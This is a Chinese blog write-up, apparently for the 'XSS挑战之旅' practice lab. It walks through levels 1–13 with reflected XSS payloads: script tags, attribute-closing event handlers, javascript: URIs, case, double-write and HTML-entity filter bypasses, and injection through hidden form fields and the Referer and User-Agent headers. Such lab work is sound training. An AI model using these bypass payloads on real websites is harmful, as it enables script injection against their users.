Xss挑战之旅writeup

最新推荐文章于 2023-02-05 17:19:46 发布
最新推荐文章于 2023-02-05 17:19:46 发布
阅读量3.5k 收藏 11
点赞数
分类专栏: 信息安全 xss WriteUp 文章标签: xss
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/cherrie007/article/details/77340301
版权
信息安全 同时被 3 个专栏收录
17 篇文章 2 订阅
订阅专栏
WriteUp
4 篇文章 0 订阅
订阅专栏
xss
1 篇文章 0 订阅
订阅专栏

Level_1
输入点在url中,反射型

payload: http://118.89.167.246:2503/xss-game/level1.php?name=<script>alert(/xss/)</script>

这里写图片描述

Level 2
搜索型,查看元素可以看到输入在input标签内,需要闭合input标签
这里写图片描述

Payload: “><script>alert(‘xss’)</script><

这里写图片描述

Level 3
输入点在input标签的value属性里面,尝试闭合属性,基于事件弹窗 ,双引号失败,试试 单引号

Paload: ‘ onmouseover=alert(‘xss’)

这里写图片描述

Level 4
和上一题一样,输入点也是在value属性里面,这次用双引号闭合属性

Payload: “ onmouseover=alert(‘xss’) “

这里写图片描述

Level 5
过滤情况:
On替换为o_n
Script替换为sc_ript
大小写尝试了也不行,只能用别的办法了

Payload: “><a href=javascript:alert(‘xss’)>111</a><

这里写图片描述

Level 6.
过滤情况:
On替换为o_n
Script替换为sc_ript
Href替换为hr_ef
尝试了一下用大小写绕过

Payload: “><img Src=ss Onerror=alert(‘xss’)>
        “><Script>alert(‘xss’)</SCript>
        “><a HRef=javascript:alert(‘xss’)>hh</a>

这里写图片描述

Level 7
输入一个”><script>alert(‘xss’)</script>试试,发现script标签被删除了!
这里写图片描述
Href和on也被删除了,尝试双写绕过
Payload: 

“><scrscriptipt>alert(‘xss’)</scriscriptpt>
“ oonnmouseover=alert ‘1’
“><a hrhrefef=javasscriptcript:alert(‘xss’)>hh</a>

这里写图片描述

Level 8
基础知识:javascript:伪协议声明了URL的主体是任意的javascript代码,它由javascript的解释器运行

Javascript会被替换为javasc_rpt,考虑用Html实体编码绕过,r编码为&#x72;

Payload: javasc&#x72;ipt:alert(xss’)

这里写图片描述

Level 9
Javascript会被替换为javasc_rpt,考虑用Html实体编码绕过,r编码为&#x72;
用上一关的payload试试,提示链接不合法,必须要有http://关键字

Payload: javasc&#x72;ipt:%0dhttp://www.0aa.me%0dalert(1) 或
javascript:alert(1)//http://www.0aa.me
%0a  %0d都为url编码的换行符

这里写图片描述

Level 10
Keyword注入点,<、>都被过滤,几乎不能突破。右键源代码看到有个hidden的form表单,
这里写图片描述

Keyword参数后面输入:

&t_link=” type=”text” 1&t_history=” type=”text” 2&t_sort =” type=”text” 3

查看注入点,发现t_sort字段可以注入
这里写图片描述

Payload: &t_sort=" type="text"onmouseover=alert`1` "

这里写图片描述

Level 11
和上题一样有个hidden的表单,不过此题的注入点在t_ref字段,值为http referer,抓包修改
这里写图片描述

referer头修改为:” type=”text” onmouseover=alert `1`

这里写图片描述

Forward放行后弹窗
这里写图片描述

Level 12
这一关的注入点在user-agent
这里写图片描述

和上题一样,抓包,改user-agent

Payload:” type=”text” onmouseover=alert `1` “

这里写图片描述

这里写图片描述

Level 13
类似的,修改cookie参数

cherrie007
关注
  • 0
    点赞
  • 11
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
XSS挑战
夜思红尘的博客
06-18 397
这里是有关于xss靶场的练习,是一个很常见的靶场。大家前来阅读!!
xss挑战1-10
weixin_45498459的博客
03-09 862
xss level1 代码 xsslevel1代码2第1中方法反射性第二种script标签level 3level4lelvel5scripta标签level6a链接">xss</alevle7lelve8level9level10 <!DOCTYPE html> <!--STATUS OK--><html> <head> <meta http-equiv="content-type" content="text/html...
xss闯关挑战
11-09
这个是XSS闯关文件,解压后放在服务器的对应文件夹即可。 闯关笔记我博客中有记录,新手可以参考。 XSS是一种经常出现在web应用中的计算机安全漏洞,它允许恶意web用户将代码植入到提供给其它用户使用的页面中。比如这些代码包括HTML代码和客户端脚本。
XSS 挑战
ST0new的博客
08-27 247
XSS 挑战@[TOC](XSS 挑战)前言挑战寻找类型是undefined的对象总结 前言 看到一篇有趣的帖子,是Gareth Heyes分享的一个有趣的xss 挑战,帖子的内容如下: <script> function solve(obj, property){ if(typeof obj === 'undefined') { obj[property].innerHTML = '<img src=1 onerror="alert(`You win`)">
xss挑战
最新发布
weixin_43995159的博客
02-05 234
xss闯关小游戏
靶场通关-XSS挑战之旅(1-5)
m0_56634355的博客
06-04 1432
直接使用在线靶场网址:https://xss.angelo.org.cn本地搭建xss靶场,这个简单百度吧点击图片后,进入下图:我们可以看到用于js弹窗的代码顺利执行了 看看源码,分析一下 接下来去服务器端看看这一关的源码......
XSS挑战之旅[全20关]上
ldkpolite007的博客
05-06 2593
Contents 0x01 0x02 0x03 0x04 你好! 这是你第一次使用 Markdown编辑器 所展示的欢迎页。如果你想学习如何使用Markdown编辑器, 可以仔细阅读这篇文章,了解一下Markdown的基本语法知识。 新的改变 我们对Markdown编辑器进行了一些功能拓展与语法支持,除了标准的Markdown编辑器功能,我们增加了如下几点新功能,帮助你用它写博客: 全新的界面设计 ,将会带来全新的写作体验; 在创作中心设置你喜爱的代码高亮样式,Markdown 将代码片显示选择的高亮样式
使用docker搭建xss挑战之旅环境
DXfighting_的博客
04-14 1132
docker search XSS-challenge-tour 搜索镜像 Docker pull 下载镜像 Docker images 查看存在镜像 dockerrun-dt--nameXSS-challenge-tour-p84:80--rmc0ny1/XSS-challenge-tour,运行镜像文件 打开网页,查看是否成功 ...
xss-challenge(挑战之旅1~13)
weixin_55404107的博客
10-21 358
好。
Xss挑战之旅-WriteUp(前13关)
m0_46394638的博客
11-03 362
Xss挑战之旅-WriteUp(前13关) 作为荒废已久的小菜鸡恰巧这几天比较有时间,想重新整理一下XSS的笔记,于是找到搭建的xss实验靶场,重新练练手。顺手写下自己的一个解题思路,当做笔记总结。WriteUp如有错误或有更好的办法,还请大佬指教! 另附XSS挑战之旅靶场源码下载链接:https://pan.baidu.com/s/1Lw-jGb5TMddPWY8lFAn8yw 提取码:rtrg 测试字符:<'"{()}> 第一关 上测试字符,查看源码。看一下字符过滤情况,...
centOS_ 利用docker 搭建 XSS挑战之旅平台
qq_46635165的博客
10-14 654
0x00 首先 xshell6 连接 centOS ,方便接下来的一些操作;(关于xshell6 如何连接centOS) 并确保 centOS 网络通畅,不会出现网络问题;(ping www.baidu.com ) 如上图所示,网络通畅; 0x01 接下来开始安装 docker ;(经测试,比较快速安装的一条命令) curl -sSL https://get.daocloud.io/docker | sh 安装好以后:启动 docker sudo systemctl start docker # 或
XSS漏洞05】XSS通关大挑战
Fighting_hawk的博客
02-25 4196
1. 通过测试语句执行情况、网页源码: 1. 判断大小于号是否过滤与转义; 2. 判断单双引号是否过滤与转义; 3. 判断关键字是否过滤与转义; 4. 判断大小写是否转化; 5. 判断语句闭合方式。 6. 额外地,可以分析是否存在其他注入点。 2. 根据判断结果,灵活构造语句与利用绕过规则。...
XSS挑战小游戏
qq_25899635的博客
10-10 647
** XSS小游戏 找到了一个xss练习平台,在线地址:http://test.xss.tv/ 实验环境也可以本地搭建,不过需要php+mysql的环境: xss通关小游戏:https://pan.baidu.com/s/1zS2GwTNbMBXEF2yNEBeLgA 密码:85g8 ** lvevel1: 通过查看右边源码发现$str从url接收一个get型name参数,且并没有进行任何过滤...
Xss challenges writeup
code_lab
03-06 998
Stage #1非常简单,不用多说答案:"</b><script>alert(document.domain);</script>Stage #2属于输入框中的Xss,可以选择闭合标签 或者类似<input type="text" onmouseover="alert(1)">答案:aaa"><script>alert(document.domain);</script> 或者:" onclic
XSS挑战之旅
weixin_41182861的博客
09-26 2027
level-1 在“name=”后面写什么,网页就显示什么。 *查看源码,发现写入的数据在<>标签的外面,那么name的值直接换成JS: <script>alert(1)</script> <svg/onload=alert(1)> <script>confirm(1)</script> <script>prompt(1)</script> level-2 此处为搜索型的xss,分析代码,使用的是get
揭示Web安全挑战XSS攻击原理与防范策略
Web安全性测试之XSS(Cross-Site Scripting)是一项至关重要的任务,特别是在现代Web应用中。XSS漏洞是一种常见的Web安全威胁,攻击者通过在网页中嵌入恶意客户端脚本,如JavaScript,利用用户浏览器的执行能力来...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值